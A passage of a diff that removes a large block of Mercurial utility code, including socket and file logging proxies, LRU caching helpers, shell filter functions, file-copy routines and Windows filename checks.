- r'recvfrom', *args, **kwargs)
-
- def recvfrom_into(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'recvfrom_into', *args, **kwargs)
-
- def recv_into(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'recv_info', *args, **kwargs)
-
- def send(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'send', *args, **kwargs)
-
- def sendall(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'sendall', *args, **kwargs)
-
- def sendto(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'sendto', *args, **kwargs)
-
- def setblocking(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'setblocking', *args, **kwargs)
-
- def settimeout(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'settimeout', *args, **kwargs)
-
- def gettimeout(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'gettimeout', *args, **kwargs)
-
- def setsockopt(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'setsockopt', *args, **kwargs)
_DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
_DATA_ESCAPE_MAP.update({
@@ -822,1755 +35,10 @@ def escapedata(s):
return _DATA_ESCAPE_RE.sub(lambda m: _DATA_ESCAPE_MAP[m.group(0)], s)
-class baseproxyobserver(object):
- def _writedata(self, data):
- if not self.logdata:
- if self.logdataapis:
- self.fh.write('\n')
- self.fh.flush()
- return
-
- # Simple case writes all data on a single line.
- if b'\n' not in data:
- if self.logdataapis:
- self.fh.write(': %s\n' % escapedata(data))
- else:
- self.fh.write('%s> %s\n' % (self.name, escapedata(data)))
- self.fh.flush()
- return
-
- # Data with newlines is written to multiple lines.
- if self.logdataapis:
- self.fh.write(':\n')
-
- lines = data.splitlines(True)
- for line in lines:
- self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
- self.fh.flush()
-
-class fileobjectobserver(baseproxyobserver):
- """Logs file object activity."""
- def __init__(self, fh, name, reads=True, writes=True, logdata=False,
- logdataapis=True):
- self.fh = fh
- self.name = name
- self.logdata = logdata
- self.logdataapis = logdataapis
- self.reads = reads
- self.writes = writes
-
- def read(self, res, size=-1):
- if not self.reads:
- return
- # Python 3 can return None from reads at EOF instead of empty strings.
- if res is None:
- res = ''
-
- if self.logdataapis:
- self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
-
- self._writedata(res)
-
- def readline(self, res, limit=-1):
- if not self.reads:
- return
-
- if self.logdataapis:
- self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
-
- self._writedata(res)
-
- def readinto(self, res, dest):
- if not self.reads:
- return
-
- if self.logdataapis:
- self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
- res))
-
- data = dest[0:res] if res is not None else b''
- self._writedata(data)
-
- def write(self, res, data):
- if not self.writes:
- return
-
- # Python 2 returns None from some write() calls. Python 3 (reasonably)
- # returns the integer bytes written.
- if res is None and data:
- res = len(data)
-
- if self.logdataapis:
- self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
-
- self._writedata(data)
-
- def flush(self, res):
- if not self.writes:
- return
-
- self.fh.write('%s> flush() -> %r\n' % (self.name, res))
-
- # For observedbufferedinputpipe.
- def bufferedread(self, res, size):
- if not self.reads:
- return
-
- if self.logdataapis:
- self.fh.write('%s> bufferedread(%d) -> %d' % (
- self.name, size, len(res)))
-
- self._writedata(res)
-
- def bufferedreadline(self, res):
- if not self.reads:
- return
-
- if self.logdataapis:
- self.fh.write('%s> bufferedreadline() -> %d' % (
- self.name, len(res)))
-
- self._writedata(res)
-
-def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
- logdata=False, logdataapis=True):
- """Turn a file object into a logging file object."""
-
- observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
- logdata=logdata, logdataapis=logdataapis)
- return fileobjectproxy(fh, observer)
-
-class socketobserver(baseproxyobserver):
- """Logs socket activity."""
- def __init__(self, fh, name, reads=True, writes=True, states=True,
- logdata=False, logdataapis=True):
- self.fh = fh
- self.name = name
- self.reads = reads
- self.writes = writes
- self.states = states
- self.logdata = logdata
- self.logdataapis = logdataapis
-
- def makefile(self, res, mode=None, bufsize=None):
- if not self.states:
- return
-
- self.fh.write('%s> makefile(%r, %r)\n' % (
- self.name, mode, bufsize))
-
- def recv(self, res, size, flags=0):
- if not self.reads:
- return
-
- if self.logdataapis:
- self.fh.write('%s> recv(%d, %d) -> %d' % (
- self.name, size, flags, len(res)))
- self._writedata(res)
-
- def recvfrom(self, res, size, flags=0):
- if not self.reads:
- return
-
- if self.logdataapis:
- self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
- self.name, size, flags, len(res[0])))
-
- self._writedata(res[0])
-
- def recvfrom_into(self, res, buf, size, flags=0):
- if not self.reads:
- return
-
- if self.logdataapis:
- self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
- self.name, size, flags, res[0]))
-
- self._writedata(buf[0:res[0]])
-
- def recv_into(self, res, buf, size=0, flags=0):
- if not self.reads:
- return
-
- if self.logdataapis:
- self.fh.write('%s> recv_into(%d, %d) -> %d' % (
- self.name, size, flags, res))
-
- self._writedata(buf[0:res])
-
- def send(self, res, data, flags=0):
- if not self.writes:
- return
-
- self.fh.write('%s> send(%d, %d) -> %d' % (
- self.name, len(data), flags, len(res)))
- self._writedata(data)
-
- def sendall(self, res, data, flags=0):
- if not self.writes:
- return
-
- if self.logdataapis:
- # Returns None on success. So don't bother reporting return value.
- self.fh.write('%s> sendall(%d, %d)' % (
- self.name, len(data), flags))
-
- self._writedata(data)
-
- def sendto(self, res, data, flagsoraddress, address=None):
- if not self.writes:
- return
-
- if address:
- flags = flagsoraddress
- else:
- flags = 0
-
- if self.logdataapis:
- self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
- self.name, len(data), flags, address, res))
-
- self._writedata(data)
-
- def setblocking(self, res, flag):
- if not self.states:
- return
-
- self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
-
- def settimeout(self, res, value):
- if not self.states:
- return
-
- self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
-
- def gettimeout(self, res):
- if not self.states:
- return
-
- self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
-
- def setsockopt(self, level, optname, value):
- if not self.states:
- return
-
- self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
- self.name, level, optname, value))
-
-def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
- logdata=False, logdataapis=True):
- """Turn a socket into a logging socket."""
-
- observer = socketobserver(logh, name, reads=reads, writes=writes,
- states=states, logdata=logdata,
- logdataapis=logdataapis)
- return socketproxy(fh, observer)
-
-def version():
- """Return version information if available."""
- try:
- from . import __version__
- return __version__.version
- except ImportError:
- return 'unknown'
-
-def versiontuple(v=None, n=4):
- """Parses a Mercurial version string into an N-tuple.
-
- The version string to be parsed is specified with the ``v`` argument.
- If it isn't defined, the current Mercurial version string will be parsed.
-
- ``n`` can be 2, 3, or 4. Here is how some version strings map to
- returned values:
-
- >>> v = b'3.6.1+190-df9b73d2d444'
- >>> versiontuple(v, 2)
- (3, 6)
- >>> versiontuple(v, 3)
- (3, 6, 1)
- >>> versiontuple(v, 4)
- (3, 6, 1, '190-df9b73d2d444')
-
- >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
- (3, 6, 1, '190-df9b73d2d444+20151118')
-
- >>> v = b'3.6'
- >>> versiontuple(v, 2)
- (3, 6)
- >>> versiontuple(v, 3)
- (3, 6, None)
- >>> versiontuple(v, 4)
- (3, 6, None, None)
-
- >>> v = b'3.9-rc'
- >>> versiontuple(v, 2)
- (3, 9)
- >>> versiontuple(v, 3)
- (3, 9, None)
- >>> versiontuple(v, 4)
- (3, 9, None, 'rc')
-
- >>> v = b'3.9-rc+2-02a8fea4289b'
- >>> versiontuple(v, 2)
- (3, 9)
- >>> versiontuple(v, 3)
- (3, 9, None)
- >>> versiontuple(v, 4)
- (3, 9, None, 'rc+2-02a8fea4289b')
- """
- if not v:
- v = version()
- parts = remod.split('[\+-]', v, 1)
- if len(parts) == 1:
- vparts, extra = parts[0], None
- else:
- vparts, extra = parts
-
- vints = []
- for i in vparts.split('.'):
- try:
- vints.append(int(i))
- except ValueError:
- break
- # (3, 6) -> (3, 6, None)
- while len(vints) < 3:
- vints.append(None)
-
- if n == 2:
- return (vints[0], vints[1])
- if n == 3:
- return (vints[0], vints[1], vints[2])
- if n == 4:
- return (vints[0], vints[1], vints[2], extra)
-
-def cachefunc(func):
- '''cache the result of function calls'''
- # XXX doesn't handle keywords args
- if func.__code__.co_argcount == 0:
- cache = []
- def f():
- if len(cache) == 0:
- cache.append(func())
- return cache[0]
- return f
- cache = {}
- if func.__code__.co_argcount == 1:
- # we gain a small amount of time because
- # we don't need to pack/unpack the list
- def f(arg):
- if arg not in cache:
- cache[arg] = func(arg)
- return cache[arg]
- else:
- def f(*args):
- if args not in cache:
- cache[args] = func(*args)
- return cache[args]
-
- return f
-
-class cow(object):
- """helper class to make copy-on-write easier
-
- Call preparewrite before doing any writes.
- """
-
- def preparewrite(self):
- """call this before writes, return self or a copied new object"""
- if getattr(self, '_copied', 0):
- self._copied -= 1
- return self.__class__(self)
- return self
-
- def copy(self):
- """always do a cheap copy"""
- self._copied = getattr(self, '_copied', 0) + 1
- return self
-
-class sortdict(collections.OrderedDict):
- '''a simple sorted dictionary
-
- >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
- >>> d2 = d1.copy()
- >>> d2
- sortdict([('a', 0), ('b', 1)])
- >>> d2.update([(b'a', 2)])
- >>> list(d2.keys()) # should still be in last-set order
- ['b', 'a']
- '''
-
- def __setitem__(self, key, value):
- if key in self:
- del self[key]
- super(sortdict, self).__setitem__(key, value)
-
- if pycompat.ispypy:
- # __setitem__() isn't called as of PyPy 5.8.0
- def update(self, src):
- if isinstance(src, dict):
- src = src.iteritems()
- for k, v in src:
- self[k] = v
-
-class cowdict(cow, dict):
- """copy-on-write dict
-
- Be sure to call d = d.preparewrite() before writing to d.
-
- >>> a = cowdict()
- >>> a is a.preparewrite()
- True
- >>> b = a.copy()
- >>> b is a
- True
- >>> c = b.copy()
- >>> c is a
- True
- >>> a = a.preparewrite()
- >>> b is a
- False
- >>> a is a.preparewrite()
- True
- >>> c = c.preparewrite()
- >>> b is c
- False
- >>> b is b.preparewrite()
- True
- """
-
-class cowsortdict(cow, sortdict):
- """copy-on-write sortdict
-
- Be sure to call d = d.preparewrite() before writing to d.
- """
-
-class transactional(object):
- """Base class for making a transactional type into a context manager."""
- __metaclass__ = abc.ABCMeta
-
- @abc.abstractmethod
- def close(self):
- """Successfully closes the transaction."""
-
- @abc.abstractmethod
- def release(self):
- """Marks the end of the transaction.
-
- If the transaction has not been closed, it will be aborted.
- """
-
- def __enter__(self):
- return self
-
- def __exit__(self, exc_type, exc_val, exc_tb):
- try:
- if exc_type is None:
- self.close()
- finally:
- self.release()
-
- at contextlib.contextmanager
-def acceptintervention(tr=None):
- """A context manager that closes the transaction on InterventionRequired
-
- If no transaction was provided, this simply runs the body and returns
- """
- if not tr:
- yield
- return
- try:
- yield
- tr.close()
- except error.InterventionRequired:
- tr.close()
- raise
- finally:
- tr.release()
-
- at contextlib.contextmanager
-def nullcontextmanager():
- yield
-
-class _lrucachenode(object):
- """A node in a doubly linked list.
-
- Holds a reference to nodes on either side as well as a key-value
- pair for the dictionary entry.
- """
- __slots__ = (u'next', u'prev', u'key', u'value')
-
- def __init__(self):
- self.next = None
- self.prev = None
-
- self.key = _notset
- self.value = None
-
- def markempty(self):
- """Mark the node as emptied."""
- self.key = _notset
-
-class lrucachedict(object):
- """Dict that caches most recent accesses and sets.
-
- The dict consists of an actual backing dict - indexed by original
- key - and a doubly linked circular list defining the order of entries in
- the cache.
-
- The head node is the newest entry in the cache. If the cache is full,
- we recycle head.prev and make it the new head. Cache accesses result in
- the node being moved to before the existing head and being marked as the
- new head node.
- """
- def __init__(self, max):
- self._cache = {}
-
- self._head = head = _lrucachenode()
- head.prev = head
- head.next = head
- self._size = 1
- self._capacity = max
-
- def __len__(self):
- return len(self._cache)
-
- def __contains__(self, k):
- return k in self._cache
-
- def __iter__(self):
- # We don't have to iterate in cache order, but why not.
- n = self._head
- for i in range(len(self._cache)):
- yield n.key
- n = n.next
-
- def __getitem__(self, k):
- node = self._cache[k]
- self._movetohead(node)
- return node.value
-
- def __setitem__(self, k, v):
- node = self._cache.get(k)
- # Replace existing value and mark as newest.
- if node is not None:
- node.value = v
- self._movetohead(node)
- return
-
- if self._size < self._capacity:
- node = self._addcapacity()
- else:
- # Grab the last/oldest item.
- node = self._head.prev
-
- # At capacity. Kill the old entry.
- if node.key is not _notset:
- del self._cache[node.key]
-
- node.key = k
- node.value = v
- self._cache[k] = node
- # And mark it as newest entry. No need to adjust order since it
- # is already self._head.prev.
- self._head = node
-
- def __delitem__(self, k):
- node = self._cache.pop(k)
- node.markempty()
-
- # Temporarily mark as newest item before re-adjusting head to make
- # this node the oldest item.
- self._movetohead(node)
- self._head = node.next
-
- # Additional dict methods.
-
- def get(self, k, default=None):
- try:
- return self._cache[k].value
- except KeyError:
- return default
-
- def clear(self):
- n = self._head
- while n.key is not _notset:
- n.markempty()
- n = n.next
-
- self._cache.clear()
-
- def copy(self):
- result = lrucachedict(self._capacity)
- n = self._head.prev
- # Iterate in oldest-to-newest order, so the copy has the right ordering
- for i in range(len(self._cache)):
- result[n.key] = n.value
- n = n.prev
- return result
-
- def _movetohead(self, node):
- """Mark a node as the newest, making it the new head.
-
- When a node is accessed, it becomes the freshest entry in the LRU
- list, which is denoted by self._head.
-
- Visually, let's make ``N`` the new head node (* denotes head):
-
- previous/oldest <-> head <-> next/next newest
-
- ----<->--- A* ---<->-----
- | |
- E <-> D <-> N <-> C <-> B
-
- To:
-
- ----<->--- N* ---<->-----
- | |
- E <-> D <-> C <-> B <-> A
-
- This requires the following moves:
-
- C.next = D (node.prev.next = node.next)
- D.prev = C (node.next.prev = node.prev)
- E.next = N (head.prev.next = node)
- N.prev = E (node.prev = head.prev)
- N.next = A (node.next = head)
- A.prev = N (head.prev = node)
- """
- head = self._head
- # C.next = D
- node.prev.next = node.next
- # D.prev = C
- node.next.prev = node.prev
- # N.prev = E
- node.prev = head.prev
- # N.next = A
- # It is tempting to do just "head" here, however if node is
- # adjacent to head, this will do bad things.
- node.next = head.prev.next
- # E.next = N
- node.next.prev = node
- # A.prev = N
- node.prev.next = node
-
- self._head = node
-
- def _addcapacity(self):
- """Add a node to the circular linked list.
-
- The new node is inserted before the head node.
- """
- head = self._head
- node = _lrucachenode()
- head.prev.next = node
- node.prev = head.prev
- node.next = head
- head.prev = node
- self._size += 1
- return node
-
-def lrucachefunc(func):
- '''cache most recent results of function calls'''
- cache = {}
- order = collections.deque()
- if func.__code__.co_argcount == 1:
- def f(arg):
- if arg not in cache:
- if len(cache) > 20:
- del cache[order.popleft()]
- cache[arg] = func(arg)
- else:
- order.remove(arg)
- order.append(arg)
- return cache[arg]
- else:
- def f(*args):
- if args not in cache:
- if len(cache) > 20:
- del cache[order.popleft()]
- cache[args] = func(*args)
- else:
- order.remove(args)
- order.append(args)
- return cache[args]
-
- return f
-
-class propertycache(object):
- def __init__(self, func):
- self.func = func
- self.name = func.__name__
- def __get__(self, obj, type=None):
- result = self.func(obj)
- self.cachevalue(obj, result)
- return result
-
- def cachevalue(self, obj, value):
- # __dict__ assignment required to bypass __setattr__ (eg: repoview)
- obj.__dict__[self.name] = value
-
-def clearcachedproperty(obj, prop):
- '''clear a cached property value, if one has been set'''
- if prop in obj.__dict__:
- del obj.__dict__[prop]
-
-def pipefilter(s, cmd):
- '''filter string S through command CMD, returning its output'''
- p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
- stdin=subprocess.PIPE, stdout=subprocess.PIPE)
- pout, perr = p.communicate(s)
- return pout
-
-def tempfilter(s, cmd):
- '''filter string S through a pair of temporary files with CMD.
- CMD is used as a template to create the real command to be run,
- with the strings INFILE and OUTFILE replaced by the real names of
- the temporary files generated.'''
- inname, outname = None, None
- try:
- infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
- fp = os.fdopen(infd, r'wb')
- fp.write(s)
- fp.close()
- outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
- os.close(outfd)
- cmd = cmd.replace('INFILE', inname)
- cmd = cmd.replace('OUTFILE', outname)
- code = os.system(cmd)
- if pycompat.sysplatform == 'OpenVMS' and code & 1:
- code = 0
- if code:
- raise Abort(_("command '%s' failed: %s") %
- (cmd, explainexit(code)))
- return readfile(outname)
- finally:
- try:
- if inname:
- os.unlink(inname)
- except OSError:
- pass
- try:
- if outname:
- os.unlink(outname)
- except OSError:
- pass
-
-filtertable = {
- 'tempfile:': tempfilter,
- 'pipe:': pipefilter,
- }
-
-def filter(s, cmd):
- "filter a string through a command that transforms its input to its output"
- for name, fn in filtertable.iteritems():
- if cmd.startswith(name):
- return fn(s, cmd[len(name):].lstrip())
- return pipefilter(s, cmd)
-
def binary(s):
"""return true if a string is binary data"""
return bool(s and '\0' in s)
-def increasingchunks(source, min=1024, max=65536):
- '''return no less than min bytes per chunk while data remains,
- doubling min after each chunk until it reaches max'''
- def log2(x):
- if not x:
- return 0
- i = 0
- while x:
- x >>= 1
- i += 1
- return i - 1
-
- buf = []
- blen = 0
- for chunk in source:
- buf.append(chunk)
- blen += len(chunk)
- if blen >= min:
- if min < max:
- min = min << 1
- nmin = 1 << log2(blen)
- if nmin > min:
- min = nmin
- if min > max:
- min = max
- yield ''.join(buf)
- blen = 0
- buf = []
- if buf:
- yield ''.join(buf)
-
-Abort = error.Abort
-
-def always(fn):
- return True
-
-def never(fn):
- return False
-
-def nogc(func):
- """disable garbage collector
-
- Python's garbage collector triggers a GC each time a certain number of
- container objects (the number being defined by gc.get_threshold()) are
- allocated even when marked not to be tracked by the collector. Tracking has
- no effect on when GCs are triggered, only on what objects the GC looks
- into. As a workaround, disable GC while building complex (huge)
- containers.
-
- This garbage collector issue have been fixed in 2.7. But it still affect
- CPython's performance.
- """
- def wrapper(*args, **kwargs):
- gcenabled = gc.isenabled()
- gc.disable()
- try:
- return func(*args, **kwargs)
- finally:
- if gcenabled:
- gc.enable()
- return wrapper
-
-if pycompat.ispypy:
- # PyPy runs slower with gc disabled
- nogc = lambda x: x
-
-def pathto(root, n1, n2):
- '''return the relative path from one place to another.
- root should use os.sep to separate directories
- n1 should use os.sep to separate directories
- n2 should use "/" to separate directories
- returns an os.sep-separated path.
-
- If n1 is a relative path, it's assumed it's
- relative to root.
- n2 should always be relative to root.
- '''
- if not n1:
- return localpath(n2)
- if os.path.isabs(n1):
- if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
- return os.path.join(root, localpath(n2))
- n2 = '/'.join((pconvert(root), n2))
- a, b = splitpath(n1), n2.split('/')
- a.reverse()
- b.reverse()
- while a and b and a[-1] == b[-1]:
- a.pop()
- b.pop()
- b.reverse()
- return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
-
-def mainfrozen():
- """return True if we are a frozen executable.
-
- The code supports py2exe (most common, Windows only) and tools/freeze
- (portable, not much used).
- """
- return (safehasattr(sys, "frozen") or # new py2exe
- safehasattr(sys, "importers") or # old py2exe
- imp.is_frozen(u"__main__")) # tools/freeze
-
-# the location of data files matching the source code
-if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
- # executable version (py2exe) doesn't support __file__
- datapath = os.path.dirname(pycompat.sysexecutable)
-else:
- datapath = os.path.dirname(pycompat.fsencode(__file__))
-
-i18n.setdatapath(datapath)
-
-_hgexecutable = None
-
-def hgexecutable():
- """return location of the 'hg' executable.
-
- Defaults to $HG or 'hg' in the search path.
- """
- if _hgexecutable is None:
- hg = encoding.environ.get('HG')
- mainmod = sys.modules[r'__main__']
- if hg:
- _sethgexecutable(hg)
- elif mainfrozen():
- if getattr(sys, 'frozen', None) == 'macosx_app':
- # Env variable set by py2app
- _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
- else:
- _sethgexecutable(pycompat.sysexecutable)
- elif (os.path.basename(
- pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
- _sethgexecutable(pycompat.fsencode(mainmod.__file__))
- else:
- exe = findexe('hg') or os.path.basename(sys.argv[0])
- _sethgexecutable(exe)
- return _hgexecutable
-
-def _sethgexecutable(path):
- """set location of the 'hg' executable"""
- global _hgexecutable
- _hgexecutable = path
-
-def _testfileno(f, stdf):
- fileno = getattr(f, 'fileno', None)
- try:
- return fileno and fileno() == stdf.fileno()
- except io.UnsupportedOperation:
- return False # fileno() raised UnsupportedOperation
-
-def isstdin(f):
- return _testfileno(f, sys.__stdin__)
-
-def isstdout(f):
- return _testfileno(f, sys.__stdout__)
-
-def shellenviron(environ=None):
- """return environ with optional override, useful for shelling out"""
- def py2shell(val):
- 'convert python object into string that is useful to shell'
- if val is None or val is False:
- return '0'
- if val is True:
- return '1'
- return pycompat.bytestr(val)
- env = dict(encoding.environ)
- if environ:
- env.update((k, py2shell(v)) for k, v in environ.iteritems())
- env['HG'] = hgexecutable()
- return env
-
-def system(cmd, environ=None, cwd=None, out=None):
- '''enhanced shell command execution.
- run with environment maybe modified, maybe in different dir.
-
- if out is specified, it is assumed to be a file-like object that has a
- write() method. stdout and stderr will be redirected to out.'''
- try:
- stdout.flush()
- except Exception:
- pass
- cmd = quotecommand(cmd)
- env = shellenviron(environ)
- if out is None or isstdout(out):
- rc = subprocess.call(cmd, shell=True, close_fds=closefds,
- env=env, cwd=cwd)
- else:
- proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
- env=env, cwd=cwd, stdout=subprocess.PIPE,
- stderr=subprocess.STDOUT)
- for line in iter(proc.stdout.readline, ''):
- out.write(line)
- proc.wait()
- rc = proc.returncode
- if pycompat.sysplatform == 'OpenVMS' and rc & 1:
- rc = 0
- return rc
-
-def checksignature(func):
- '''wrap a function with code to check for calling errors'''
- def check(*args, **kwargs):
- try:
- return func(*args, **kwargs)
- except TypeError:
- if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
- raise error.SignatureError
- raise
-
- return check
-
-# a whilelist of known filesystems where hardlink works reliably
-_hardlinkfswhitelist = {
- 'btrfs',
- 'ext2',
- 'ext3',
- 'ext4',
- 'hfs',
- 'jfs',
- 'NTFS',
- 'reiserfs',
- 'tmpfs',
- 'ufs',
- 'xfs',
- 'zfs',
-}
-
-def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
- '''copy a file, preserving mode and optionally other stat info like
- atime/mtime
-
- checkambig argument is used with filestat, and is useful only if
- destination file is guarded by any lock (e.g. repo.lock or
- repo.wlock).
-
- copystat and checkambig should be exclusive.
- '''
- assert not (copystat and checkambig)
- oldstat = None
- if os.path.lexists(dest):
- if checkambig:
- oldstat = checkambig and filestat.frompath(dest)
- unlink(dest)
- if hardlink:
- # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
- # unless we are confident that dest is on a whitelisted filesystem.
- try:
- fstype = getfstype(os.path.dirname(dest))
- except OSError:
- fstype = None
- if fstype not in _hardlinkfswhitelist:
- hardlink = False
- if hardlink:
- try:
- oslink(src, dest)
- return
- except (IOError, OSError):
- pass # fall back to normal copy
- if os.path.islink(src):
- os.symlink(os.readlink(src), dest)
- # copytime is ignored for symlinks, but in general copytime isn't needed
- # for them anyway
- else:
- try:
- shutil.copyfile(src, dest)
- if copystat:
- # copystat also copies mode
- shutil.copystat(src, dest)
- else:
- shutil.copymode(src, dest)
- if oldstat and oldstat.stat:
- newstat = filestat.frompath(dest)
- if newstat.isambig(oldstat):
- # stat of copied file is ambiguous to original one
- advanced = (
- oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
- os.utime(dest, (advanced, advanced))
- except shutil.Error as inst:
- raise Abort(str(inst))
-
-def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
- """Copy a directory tree using hardlinks if possible."""
- num = 0
-
- gettopic = lambda: hardlink and _('linking') or _('copying')
-
- if os.path.isdir(src):
- if hardlink is None:
- hardlink = (os.stat(src).st_dev ==
- os.stat(os.path.dirname(dst)).st_dev)
- topic = gettopic()
- os.mkdir(dst)
- for name, kind in listdir(src):
- srcname = os.path.join(src, name)
- dstname = os.path.join(dst, name)
- def nprog(t, pos):
- if pos is not None:
- return progress(t, pos + num)
- hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
- num += n
- else:
- if hardlink is None:
- hardlink = (os.stat(os.path.dirname(src)).st_dev ==
- os.stat(os.path.dirname(dst)).st_dev)
- topic = gettopic()
-
- if hardlink:
- try:
- oslink(src, dst)
- except (IOError, OSError):
- hardlink = False
- shutil.copy(src, dst)
- else:
- shutil.copy(src, dst)
- num += 1
- progress(topic, num)
- progress(topic, None)
-
- return hardlink, num
-
-_winreservednames = {
- 'con', 'prn', 'aux', 'nul',
- 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
- 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
-}
-_winreservedchars = ':*?"<>|'
-def checkwinfilename(path):
- r'''Check that the base-relative path is a valid filename on Windows.
- Returns None if the path is ok, or a UI string describing the problem.
-
- >>> checkwinfilename(b"just/a/normal/path")
- >>> checkwinfilename(b"foo/bar/con.xml")
- "filename contains 'con', which is reserved on Windows"
- >>> checkwinfilename(b"foo/con.xml/bar")
- "filename contains 'con', which is reserved on Windows"
- >>> checkwinfilename(b"foo/bar/xml.con")
- >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
- "filename contains 'AUX', which is reserved on Windows"
- >>> checkwinfilename(b"foo/bar/bla:.txt")
- "filename contains ':', which is reserved on Windows"
- >>> checkwinfilename(b"foo/bar/b\07la.txt")
- "filename contains '\\x07', which is invalid on Windows"
- >>> checkwinfilename(b"foo/bar/bla ")
- "filename ends with ' ', which is not allowed on Windows"
- >>> checkwinfilename(b"../bar")
- >>> checkwinfilename(b"foo\\")
- "filename ends with '\\', which is invalid on Windows"
- >>> checkwinfilename(b"foo\\/bar")
- "directory name ends with '\\', which is invalid on Windows"
- '''
- if path.endswith('\\'):
- return _("filename ends with '\\', which is invalid on Windows")
- if '\\/' in path:
- return _("directory name ends with '\\', which is invalid on Windows")
- for n in path.replace('\\', '/').split('/'):
- if not n:
- continue
- for c in _filenamebytestr(n):
- if c in _winreservedchars:
- return _("filename contains '%s', which is reserved "
- "on Windows") % c
- if ord(c) <= 31:
- return _("filename contains '%s', which is invalid "
- "on Windows") % escapestr(c)
- base = n.split('.')[0]
- if base and base.lower() in _winreservednames:
- return _("filename contains '%s', which is reserved "
- "on Windows") % base
- t = n[-1:]
- if t in '. ' and n not in '..':
- return _("filename ends with '%s', which is not allowed "
- "on Windows") % t
-
-if pycompat.iswindows:
- checkosfilename = checkwinfilename
- timer = time.clock
-else:
- checkosfilename = platform.checkosfilename
- timer = time.time
-
-if safehasattr(time, "perf_counter"):
- timer = time.perf_counter
-
-def makelock(info, pathname):
- """Create a lock file atomically if possible
-
- This may leave a stale lock file if symlink isn't supported and signal
- interrupt is enabled.
- """
- try:
- return os.symlink(info, pathname)
- except OSError as why:
- if why.errno == errno.EEXIST:
- raise
- except AttributeError: # no symlink in os
- pass
-
- flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
- ld = os.open(pathname, flags)
- os.write(ld, info)
- os.close(ld)
-
-def readlock(pathname):
- try:
- return os.readlink(pathname)
- except OSError as why:
- if why.errno not in (errno.EINVAL, errno.ENOSYS):
- raise
- except AttributeError: # no symlink in os
- pass
- fp = posixfile(pathname, 'rb')
- r = fp.read()
- fp.close()
- return r
-
-def fstat(fp):
- '''stat file object that may not have fileno method.'''
- try:
- return os.fstat(fp.fileno())
- except AttributeError:
- return os.stat(fp.name)
-
-# File system features
-
-def fscasesensitive(path):
- """
- Return true if the given path is on a case-sensitive filesystem
-
- Requires a path (like /foo/.hg) ending with a foldable final
- directory component.
- """
- s1 = os.lstat(path)
- d, b = os.path.split(path)
- b2 = b.upper()
- if b == b2:
- b2 = b.lower()
- if b == b2:
- return True # no evidence against case sensitivity
- p2 = os.path.join(d, b2)
- try:
- s2 = os.lstat(p2)
- if s2 == s1:
- return False
- return True
- except OSError:
- return True
-
-try:
- import re2
- _re2 = None
-except ImportError:
- _re2 = False
-
-class _re(object):
- def _checkre2(self):
- global _re2
- try:
- # check if match works, see issue3964
- _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
- except ImportError:
- _re2 = False
-
- def compile(self, pat, flags=0):
- '''Compile a regular expression, using re2 if possible
-
- For best performance, use only re2-compatible regexp features. The
- only flags from the re module that are re2-compatible are
- IGNORECASE and MULTILINE.'''
- if _re2 is None:
- self._checkre2()
- if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
- if flags & remod.IGNORECASE:
- pat = '(?i)' + pat
- if flags & remod.MULTILINE:
- pat = '(?m)' + pat
- try:
- return re2.compile(pat)
- except re2.error:
- pass
- return remod.compile(pat, flags)
-
- @propertycache
- def escape(self):
- '''Return the version of escape corresponding to self.compile.
-
- This is imperfect because whether re2 or re is used for a particular
- function depends on the flags, etc, but it's the best we can do.
- '''
- global _re2
- if _re2 is None:
- self._checkre2()
- if _re2:
- return re2.escape
- else:
- return remod.escape
-
-re = _re()
-
-_fspathcache = {}
-def fspath(name, root):
- '''Get name in the case stored in the filesystem
-
- The name should be relative to root, and be normcase-ed for efficiency.
-
